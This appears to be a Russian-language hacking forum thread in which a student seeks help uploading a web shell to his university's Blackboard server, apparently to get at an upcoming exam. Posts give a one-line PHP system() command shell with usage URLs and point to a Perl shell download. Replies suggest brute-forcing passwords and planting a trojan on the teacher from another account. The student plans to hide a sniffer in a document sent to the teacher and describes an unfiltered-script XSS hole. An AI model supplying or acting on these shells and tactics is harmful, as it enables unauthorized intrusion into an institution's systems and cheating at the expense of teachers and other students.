Сайт университета
 

Учитель имеет сайт на серваке университета. У каждого ученика на сайте университета (не учителя) свой экяунт.
Через этот экяунт мы можем повылать ЛЮБЫЕ файлы учителю. Но когда посылаешь файл то учитель видет от кого он пришел. Также можно хранить на сервере файлы.
Я пробовал залить на сервер файл r57shell.php - он его не берет, видимо потамучто файл много занимет.
Также пробовал залить самодельный шелл shell.php
в нем:
<? system($_GET[c]); ?>
Он его взял залил в ../upload/_3456/shell.php мне на моем экяунте показал ссылку этого файла. Я кликаю на ссылку то мне на белом окне вылетает
<? system($_GET[c]); ?>
Причем когда копируешь эту ссылку файла в буфер потом встовзяешь в internet explorer то те пишут ACCESS Denied.
"Назад к учителю" У него сайт простой из html никаких скриптов.
Мой вопрос у кого есть какие идеи чтоб туда шелл залить. Просто экламен через ниделю.
Извините но полный адрес сайта учителя дать не могу.
Да ща только что пробывал залить эту вышеперечисленую шеллу на другой провереный сервак то просто выпадает пустой скрин.
Зарание спасибо.

дык наверное надо его юзать так
http://www.xxx.com/shell.php?c=id
или
http://www.xxx.com/shell.php&c=id
)

Ты уверен что на серваке есть поддержка Php?

а по твоему ) как оно тогда залило?)

Через html можно тоже заливать.

Прикольно сказал

попробуй брутом пас угнать или трояном который можно впарить преподу и не со своего аккаунта. как вариант с забрученого аккаунта своего врага...

Попробуй вот так:

<?php system($_GET['c']); ?>

Пример использования (для винды) => xttp://site/shell.php?c=dir

Ыыы, поспешил=)) прочитал только что r57shell.php не залился, до конца не дочитав пост=(

Вроде бы доступ ограничен.

Я попробовал туда свою "upload" форму залить, но у меня форма состоит из двух файлов "index.html" и "upload.pl" два файла залились нормально но когда начал заливать свой шелл через свою форму то получил вот такую ошибку

HTTP Status 404 - /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

--------------------------------------------------------------------------------

type Status report

message /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

description The requested resource (/courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl) is not available.

т.е говорит что upload.pl в той папке нету.
но когда открываю вот так
hxxp://сайт.edu/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

то он там :(

Вот моя upload форма
http://rapidshare.de/files/17066204/uploader.rar.html

Может у кого есть upload форма одним файлом, а не двумя?

Тоже ниче не показывает кроме <?php system($_GET['c']); ?>

Да? странно... ну попробуй тогда написать там "123" - я уверен, покажет "123" !
Попробуй 12345qwe - покажет 12345qwe...
Павел Глоба предсказывает что у тебя не стоит пхп...

А на html шелла случайно ни укого нету?

ее.............................................. .. нет...................................

-------------------------------

кстати вариант... НО ИМХО врятле прокатит.

Знаеш что попробуй залить perl shell например r57pws взять можно отсюда http://rst.void.ru/download/r57pws.txt

EST a1ien
Спасибо за шелл - переименовал её в .pl, залил таже история сервак открывает ее как в блокноте. :(
В этой шеле надо же еще знать адрес перла не серваке.

"Измените первую сроку скрипта "/usr/bin/perl" на корректный путь к интерпритатору перла на Вашем сервере."

А как его узнать?

Попробуй залей локальный файл. Если прочитает, легче по исходникам будет...

ИМХО мона сливать воду. Читай пост КЕЗа, только "пхп" замени на "перл"

Я ща толь что се на сервак залил shell.php и shell.pl в которых в нутри только <?php system($_GET['c']); ?> и все больше никаких тагов нет.
Пробовал
hццp://www.xxx.com/shell.php?c=id
или
hццp://www.xxx.com/shell.php&c=id
или
xttp://site/shell.php?c=dir
или
hццp://www.xxx.com/shell.pl?c=id
или
hццp://www.xxx.com/shell.pl&c=id
или
xttp://site/shell.pl?c=dir

Получаю пустой экран :(, при этом мой сервак поддерживает PHP и R57shell.php там работает нормально.
Вот в общем файл который заливаю.
http://rapidshare.de/files/17160217/shell.php.html

Сам сервак университета должен есть перл потамучто
webapps/portal/frameset.jsp?tab=courses&url=/bin/common/course.pl?course_id=_553_1
Только как узнать адресс перла на серваке?
Чтоб работала http://rst.void.ru/download/r57pws.txt

Сайт университета стоит на движке "Powered by Blackboard'"

Эсли твой upload.pl работает то почему тогда неработает perl shell

Вот именно что upload.pl не пашет. а просто текстом все вылетает.
Интересно upload форма на html в одном файле есть у кого?
Нам надо еще будет выслать завтро учителю html досумент, попробую в него сниффер запехнуть.

Понимаеш невозможно залить файлы при помощи HTML и скорее всего в твоей деректории нельзя исполнять PHP,perl и т.д такчто врядли чтото получиться кстати в ПМ я тебе кидаю адрес твоего универв

EST a1ien
Мда жалко, не ужели других выходов нету?

только что дыру на своем сайте универсистета нашел.
Когда встовляешь сообшение то никакой фильтрации тагов не происходит тоесть если вставить <script>gfgfg</script> то будет работать.
Но проблема в том что сниффер вставлять - не имеет значение, сайт не использует cookie.
Решил вставить php скрипт - не пашет, сервак не поддерживат php. Пробавал вставить шелл не перле т.е вставить скрипт шелла в соощении - то это все вылетает текстом. Потамучто похоже скрипт встовляется между <HTML> perl script </HTML> поэтаму не работает.
Мой вопрос у когонибудь есть javascript uploader. Хочу туда .pl шелл залить.